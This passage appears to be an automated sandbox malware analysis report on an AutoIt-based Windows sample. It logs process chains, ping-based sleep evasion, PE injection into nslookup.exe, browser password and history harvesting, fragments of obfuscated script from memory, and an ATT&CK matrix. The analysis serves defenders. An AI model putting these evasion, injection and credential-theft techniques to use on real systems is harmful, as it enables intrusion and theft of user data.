Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Uses ping.exe to sleep

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30

Source: C:\Users\user\Desktop\WDnE51mua6.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\WDnE51mua6.exe

Code function: 0_3_04646816 sldt word ptr [eax+00000000h]

Source: C:\Windows\SysWOW64\nslookup.exe	Thread delayed: delay time: 300000
Source: C:\Windows\SysWOW64\nslookup.exe	Thread delayed: delay time: 300000

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\conhost.exe

Window / User API: threadDelayed 551

Source: C:\Windows\System32\conhost.exe TID: 4272	Thread sleep count: 551 > 30
Source: C:\Windows\SysWOW64\nslookup.exe TID: 7084	Thread sleep count: 73 > 30
Source: C:\Windows\SysWOW64\nslookup.exe TID: 7084	Thread sleep time: -21900000s >= -30000s
Source: C:\Windows\SysWOW64\nslookup.exe TID: 7084	Thread sleep time: -300000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\nslookup.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\nslookup.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_00409931 ??2@YAPAXI@Z,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_00404402 FindFirstFileW,FindClose,SetLastError,CompareFileTime,
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_00403327 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_00403442 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Code function: 6_2_0091E334 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0028E334 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0029A32C FindFirstFileW,Sleep,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_002965AE FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0025C6C2 FindFirstFileExW,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00297205 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_002972A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0028D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0028DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00299E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00299F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com

Code function: 6_2_008B29A4 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

Source: C:\Windows\SysWOW64\nslookup.exe	Thread delayed: delay time: 300000
Source: C:\Windows\SysWOW64\nslookup.exe	Thread delayed: delay time: 300000

Source: Gia.exe.com, 00000006.00000003.373817469.0000000003A0F000.00000004.00000001.sdmp	Binary or memory string: VSBQTQCGHGFSVBZNPa
Source: Gia.exe.com, 00000007.00000003.481222837.0000000000C86000.00000004.00000001.sdmp	Binary or memory string: For $XiNdoKGhHHMCONMOTWHGfSTeNgLuudMzhkzCOkswjyqkIf = 14 To 21iHv
Source: WMIC.exe, 0000001B.00000002.525079315.0000000003240000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Gia.exe.com, 00000006.00000003.379643001.00000000014A1000.00000004.00000001.sdmp, Gia.exe.com, 00000007.00000003.500853897.0000000001015000.00000004.00000001.sdmp	Binary or memory string: XINDOKGHHHMCONMOTWHGFSTENGLUUDMZHKZCOKSWJYQKIF
Source: Gia.exe.com, 00000006.00000003.363693331.0000000001246000.00000004.00000001.sdmp	Binary or memory string: Local $vSBQTqCgHgfSVBzNP = WFzUldrKAarEmh("108$94$113$95$116$92$108$80$122$95$72$111$72$127$80$120$83$92$116$80$124$110$124$126$74$120",5)bpP'V
Source: Gia.exe.com, 00000006.00000003.363693331.0000000001246000.00000004.00000001.sdmp, juROhmfLml.exe.com, 0000000C.00000003.517559340.0000000001815000.00000004.00000001.sdmp, D.4.dr	Binary or memory string: $vSBQTqCgHgfSVBzNP = WFzUldrKAarEmh("74$118$85$93$119$111$103$125$93$120$113$69$110$114$80$80$85$74$112$115$120$76$106$102$115",4)
Source: Gia.exe.com, 00000007.00000003.484283807.0000000000E1B000.00000004.00000001.sdmp, juROhmfLml.exe.com, 0000000C.00000003.512752448.0000000001735000.00000004.00000001.sdmp, D.4.dr	Binary or memory string: Local $vSBQTqCgHgfSVBzNP = WFzUldrKAarEmh("108$94$113$95$116$92$108$80$122$95$72$111$72$127$80$120$83$92$116$80$124$110$124$126$74$120",5)
Source: nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: Gia.exe.com, 00000006.00000003.363693331.0000000001246000.00000004.00000001.sdmp, Gia.exe.com, 00000007.00000003.485762857.0000000000DEE000.00000004.00000001.sdmp, juROhmfLml.exe.com, 0000000C.00000003.517346905.00000000017B0000.00000004.00000001.sdmp, D.4.dr	Binary or memory string: Local $OAqRAdBbLENaGz = Execute(WFzUldrKAarEmh("83$116$114$105$110$103$73$115$70$108$111$97$116$40$39$99$88$111$72$89$77$97$80$97$39$41",0)), $rmmUODWAgzS = 'WnhgFsHZLPgRZzChkPpMgNPUzgtiphUTx'
Source: juROhmfLml.exe.com, 0000000C.00000003.525890863.0000000003A7D000.00000004.00000001.sdmp	Binary or memory string: AYMJRBYKOZPULCBEXEFVMCIRPJNVHKMNQLYPKHLNORGCWOLBBRWSHWLTBV
Source: WMIC.exe, 0000001B.00000002.525079315.0000000003240000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: juROhmfLml.exe.com, 0000000C.00000003.526715313.00000000019DF000.00000004.00000001.sdmp	Binary or memory string: XINDOKGHHHMCONMOTWHGFSTENGLUUDMZHKZCOKSWJYQKIFzY6
Source: juROhmfLml.exe.com, 0000000C.00000003.521769343.0000000003EAD000.00000004.00000001.sdmp	Binary or memory string: VSBQTQCGHGFSVBZNP=
Source: Gia.exe.com, 00000007.00000003.497896623.000000000333D000.00000004.00000001.sdmp, juROhmfLml.exe.com, 0000000C.00000003.523133517.0000000003D3B000.00000004.00000001.sdmp	Binary or memory string: WnhgFsHZLPgRZzChkPpMgNPUzgtiphUTx
Source: Gia.exe.com, 00000007.00000003.491094566.0000000003773000.00000004.00000001.sdmp, juROhmfLml.exe.com, 0000000C.00000002.530969482.00000000041DF000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Gia.exe.com, 00000007.00000003.479485061.0000000000C89000.00000004.00000001.sdmp	Binary or memory string: For $AyMjRBYKozpULCBeXeFVMcIRpJnVhKmNQLypkhlNOrGCWOLBbRWsHwltbV = 2 To 35'~O
Source: Gia.exe.com, 00000007.00000003.361970252.0000000003812000.00000004.00000001.sdmp, D.4.dr	Binary or memory string: For $XiNdoKGhHHMCONMOTWHGfSTeNgLuudMzhkzCOkswjyqkIf = 14 To 21
Source: nslookup.exe, 00000010.00000002.591747509.0000000003B37000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW8O
Source: Gia.exe.com, 00000006.00000003.375300453.00000000038A4000.00000004.00000001.sdmp	Binary or memory string: WnhgFsHZLPgRZzChkPpMgNPUzgtiphUTx;
Source: D.4.dr	Binary or memory string: For $AyMjRBYKozpULCBeXeFVMcIRpJnVhKmNQLypkhlNOrGCWOLBbRWsHwltbV = 2 To 35
Source: Gia.exe.com, 00000007.00000003.488239080.0000000000E52000.00000004.00000001.sdmp	Binary or memory string: $vSBQTqCgHgfSVBzNP = WFzUldrKAarEmh("74$118$85$93$119$111$103$125$93$120$113$69$110$114$80$80$85$74$112$115$120$76$106$102$115",4)W
Source: WMIC.exe, 0000001B.00000002.525079315.0000000003240000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: Gia.exe.com, 00000007.00000003.495710670.00000000034B7000.00000004.00000001.sdmp	Binary or memory string: VSBQTQCGHGFSVBZNPG
Source: Gia.exe.com, 00000006.00000003.373817469.0000000003A0F000.00000004.00000001.sdmp, Gia.exe.com, 00000007.00000003.495710670.00000000034B7000.00000004.00000001.sdmp, juROhmfLml.exe.com, 0000000C.00000003.521769343.0000000003EAD000.00000004.00000001.sdmp	Binary or memory string: VSBQTQCGHGFSVBZNP
Source: WMIC.exe, 0000001B.00000002.525079315.0000000003240000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Code function: 12_2_0029F2E8 BlockInput,

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com

Code function: 6_2_008B331E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

Source: C:\Users\user\Desktop\WDnE51mua6.exe

Code function: 0_2_00407E2D LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetDlgItem,GetWindow,

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Code function: 6_2_008D5108 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00245108 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Code function: 12_2_0028207D GetProcessHeap,HeapAlloc,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CreateThread,

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Code function: 6_2_008D1041 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Code function: 6_2_008E29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00240DF5 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_002529B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00240C5F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00241041 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Memory written: C:\Windows\SysWOW64\nslookup.exe base: 2C60000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Memory written: C:\Windows\SysWOW64\nslookup.exe base: 2800000 value starts with: 4D5A

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Memory written: C:\Windows\SysWOW64\nslookup.exe base: 2C60000
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Memory written: C:\Windows\SysWOW64\nslookup.exe base: 2800000
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Memory written: C:\Windows\SysWOW64\nslookup.exe base: 27F2000

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com

Code function: 6_2_008B331E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com

Code function: 6_2_008CFC88 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Code function: 12_2_0028EB2C mouse_event,

Source: C:\Users\user\Desktop\WDnE51mua6.exe	Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Windows\System32\svchost.exe'
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c CmD < Poi.vsd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe CmD
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$' Che.vsd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com Gia.exe.com D
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Process created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Process created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ver > 'C:\Users\user\AppData\Local\Temp\chrCF8.tmp'
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic process get Name > 'C:\Users\user\AppData\Local\Temp\chr1073.tmp'
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process get Name
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\makecab.exe makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Code function: 12_2_002813DC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

Source: C:\Users\user\Desktop\WDnE51mua6.exe

Code function: 0_2_00403F0A AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

Source: Gia.exe.com, 00000006.00000000.354662827.0000000000973000.00000002.00020000.sdmp, Gia.exe.com, 00000007.00000002.502815629.0000000000973000.00000002.00020000.sdmp, juROhmfLml.exe.com, 0000000C.00000002.529054024.00000000002E3000.00000002.00020000.sdmp, Gia.exe.com.5.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Gia.exe.com, juROhmfLml.exe.com, nslookup.exe, 00000010.00000002.592440613.00000000040C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: nslookup.exe, 00000010.00000002.592440613.00000000040C0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: nslookup.exe, 00000010.00000002.592440613.00000000040C0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: nslookup.exe, 00000010.00000002.592440613.00000000040C0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Code function: 12_2_00240AB8 cpuid

Source: C:\Users\user\Desktop\WDnE51mua6.exe

Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,

Source: C:\Windows\SysWOW64\nslookup.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\nslookup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chrB32.tmp VolumeInformation
Source: C:\Windows\SysWOW64\nslookup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chrCF8.tmp VolumeInformation
Source: C:\Windows\SysWOW64\nslookup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chr1073.tmp VolumeInformation
Source: C:\Windows\SysWOW64\nslookup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49 VolumeInformation
Source: C:\Windows\SysWOW64\nslookup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chr2302.tmp VolumeInformation

Source: C:\Users\user\Desktop\WDnE51mua6.exe

Code function: 0_2_004028F2 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??3@YAXPAX@Z,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Code function: 12_2_0025BD72 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

Source: C:\Users\user\Desktop\WDnE51mua6.exe

Code function: 0_2_00406024 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,KiUserCallbackDispatcher,GetVersionExW,GetCommandLineW,GetCommandLineW,GetCommandLineW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,??3@YAXPAX@Z,lstrlenW,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\SysWOW64\nslookup.exe	File opened: C:\Users\DefaultAccount\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\nslookup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\nslookup.exe	File opened: C:\Users\WDAGUtilityAccount\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\nslookup.exe	File opened: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\nslookup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\SysWOW64\nslookup.exe	File opened: C:\Users\Guest\AppData\Roaming\Mozilla\Firefox\profiles.ini

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_002A204C socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_002A1A4A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts2	Windows Management Instrumentation11	Startup Items1	Startup Items1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scripting1	Valid Accounts2	Exploitation for Privilege Escalation1	Deobfuscate/Decode Files or Information11	Input Capture131	File and Directory Discovery2	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Registry Run Keys / Startup Folder2	Valid Accounts2	Scripting1	Security Account Manager	System Information Discovery37	SMB/Windows Admin Shares	Input Capture131	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter1	Logon Script (Mac)	Access Token Manipulation21	Obfuscated Files or Information2	NTDS	Query Registry1	Distributed Component Object Model	Clipboard Data2	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Process Injection212	Masquerading11	LSA Secrets	Security Software Discovery31	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Registry Run Keys / Startup Folder2	Valid Accounts2	Cached Domain Credentials	Virtualization/Sandbox Evasion41	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion41	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation21	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection212	/etc/passwd and /etc/shadow	Remote System Discovery11	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Network Configuration Discovery2	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

